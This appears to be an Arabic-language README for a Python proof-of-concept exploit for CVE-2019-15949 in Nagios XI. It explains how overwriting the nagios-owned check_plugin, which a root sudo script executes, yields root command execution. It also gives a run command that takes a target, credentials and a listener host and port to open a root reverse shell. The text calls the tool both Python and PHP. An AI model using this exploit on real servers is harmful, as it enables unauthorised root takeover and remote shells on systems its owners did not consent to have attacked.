
PoC لثغرة Nagios CVE-2019-15949 rce في Python
أداة PoC بلغة Python لثغرة CVE-2019-15949
توجد ثغرة في Nagios XI <= 5.6.5 تسمح للمهاجم باستغلال تنفيذ الأوامر عن بعد (RCE) لرفع الامتيازات إلى الجذر. يتطلب الاستغلال الوصول إلى الخادم كمستخدم nagios، أو الوصول إلى CCM عبر الواجهة الإلكترونية مع صلاحيات لإدارة الإضافات.
يتم تنفيذ البرنامج النصي getprofile.sh، الذي يُستدعى عن طريق تنزيل ملف تعريف النظام (profile.php?cmd=download)، كجذر عبر إدخال sudo بدون كلمة مرور؛ ويقوم البرنامج النصي بتنفيذ الملف القابل للتنفيذ check_plugin المملوك لمستخدم nagios. يمكن لمستخدم مسجل الدخول إلى Nagios XI مع صلاحيات تعديل الإضافات، أو مستخدم nagios على الخادم، تعديل الملف القابل للتنفيذ check_plugin وإدراج أوامر ضارة قابلة للتنفيذ كجذر.
تم تطوير أداة POC بلغة PHP تقوم بتحميل حمولة تؤدي إلى إنشاء شيل عكسي بصلاحيات الجذر. الاستخدام:
python3 exploit.py tagetIp [ssl=false/true] username password Lhost lport
مثال:
python3 exploit.py 10.10.11.9 false nagiosadmin admin 10.10.11.14 4444